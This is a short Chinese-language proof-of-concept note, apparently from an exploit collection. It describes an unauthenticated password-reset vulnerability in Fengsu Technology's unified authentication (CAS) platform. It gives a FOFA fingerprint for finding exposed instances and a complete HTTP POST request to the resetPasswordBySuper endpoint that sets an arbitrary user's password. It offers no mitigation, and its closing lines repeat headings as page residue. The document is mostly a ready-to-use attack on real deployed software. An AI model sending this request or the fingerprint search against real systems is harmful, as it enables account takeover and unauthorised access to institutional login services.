风速科技统一认证平台存在密码重置漏洞

河南省风速科技统一认证平台，存在未授权漏洞，攻击者可通过该接口重置任意密码。

fofa

body="/cas/themes/zbvc/js/jquery.min.js"

poc

POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host: 
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}

风速科技统一认证平台存在密码重置漏洞​

fofa​

poc​

风速科技统一认证平台存在密码重置漏洞

fofa

poc